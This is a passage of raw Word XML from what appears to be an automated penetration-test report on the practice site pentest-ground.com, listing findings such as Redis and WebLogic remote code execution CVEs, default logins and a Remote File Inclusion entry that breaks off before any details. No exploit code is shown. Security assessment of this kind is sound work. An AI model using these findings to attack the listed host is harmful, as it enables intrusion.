                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0307B693" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1282EC8A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Password Submitted in URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="43B93579" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33454228" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0B15A1A9" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F3E82A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Server software and technology found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="7D1E6707" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12636B3C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="989898"/>
              </w:rPr>
              <w:t>✘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="177E6F75" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57E78119" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Robots.txt file found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="67507877" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="152A6C03" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4EDBD18B" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6886901A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exposure of Sensitive Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="0D5322EB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496F534F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="989898"/>
              </w:rPr>
              <w:t>✘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="09847ED9" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6202A526" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Interesting files found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="1A8692FA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C13113" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="989898"/>
              </w:rPr>
              <w:t>✘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B02EF3F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="7AA1285D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 pentest-ground.com</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayHeader"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6826"/>
        <w:gridCol w:w="1653"/>
        <w:gridCol w:w="1371"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="424ADFF2" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="139667E2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C1BF264" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="272E9D07" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5DA4DDB1" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D7E2EEA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Redis - Remote Code Execution (CVE-2022-0543)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="973232"/>
          </w:tcPr>
          <w:p w14:paraId="7CDAA557" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B05EEBE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="58C366FB" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18D9B415" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Oracle Weblogic - Remote Code Execution (CVE-2018-2894)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="973232"/>
          </w:tcPr>
          <w:p w14:paraId="72DE48DE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="549E522D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3A8E9F80" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B5294D5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Oracle WebLogic Server - Remote Code Execution (CVE-2020-2551)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="973232"/>
          </w:tcPr>
          <w:p w14:paraId="0A248D91" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3757B384" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="25AD77AD" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C89D575" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerabilities found for Redis Key-Value Store 5.0.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="1ECEA8D2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="792F466B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="989898"/>
              </w:rPr>
              <w:t>✘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1A0E355E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AD4E49E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Oracle WebLogic - Remote Code Execution (CVE-2023-21839)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="245340CA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E9527C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3D2C8AC1" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E221437" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution (CVE-2020-14883)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="6C6E5D3E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60FBF681" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="227C99EE" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D3EA6C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Redis - Default Logins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="0CD5290C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="689475EB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="03520DCB" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="212A05F8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Redis Server - Unauthenticated Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="6433D202" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="330C8B8A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="695655FC" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DE7E45B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SSH service exposed to the Internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="44307F6E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13957FD9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0155E800" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="302DA08E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Redis service exposed to the Internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="617532AA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68257DBF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="19CFE9AE" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B1F2C8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>End-of-Life (EOL) found for Redis key-value store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="60BBD7FE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="215A21D0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="584465C4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - verified finding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5300FAD3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A35CB2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc190270969"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. Findings (grouped by target)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="01281606" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc190270970"/>
      <w:r>
        <w:t>4.1 Target:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="79E1933B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://pentest-ground.com:4280/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDA4155" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.1 Remote File Inclusion </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="63CF3F14" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19094BB3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A9C222" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="4F895D5B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B8A58A0" wp14:editId="5576A3E0">
                  <wp:extent cx="1397000" cy="1397000"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>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7046C6A3" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B3C5FF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="2BBF9869" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="663F5AE4"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1AF06B4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78ECA73" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF96DA7"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2">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/fi/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="074FA49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4501A79" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
